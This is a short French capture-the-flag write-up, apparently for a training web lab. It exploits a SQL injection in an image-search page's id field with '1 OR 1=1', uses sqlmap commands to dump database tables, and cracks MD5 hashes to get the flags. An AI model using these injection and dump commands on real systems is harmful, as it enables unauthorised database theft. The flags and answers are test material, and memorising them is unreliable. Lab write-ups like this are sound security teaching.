Sur la page /?page=searchimg, le champ id est sensible aux injections SQL.

En entrant 1 OR 1=1, toute les images sont affichees.

avec sqlmap -dbs, j'ai eu la liste des tables (Member_images).

J'ai utilisé la commande "python sqlmap.py -u "http://192.168.1.11/?page=searchimg&id=1&Submit=Submit#" --dump  -T list_images -D Member_images" pour afficher la table Member_images et voir que le flag etait dans le champ comment de l'id 5;
Grace a sqlmap jai pu dump la table user avec la commande : python sqlmap.py -u "http://192.168.1.11/?page=member&id=1&Submit=Submit" --dump

Plus qu'a prendre 5ff9d0165b4f92b14994e5c685cdce28 le decrypter(md5), cela nous donne FortyTwo et fortytwo en sha256, il nous reste le flag : 10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5

1928e8083cf461a51303633093573c46 (md5 decrypt)> albatroz (sha256 encrypt)> f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188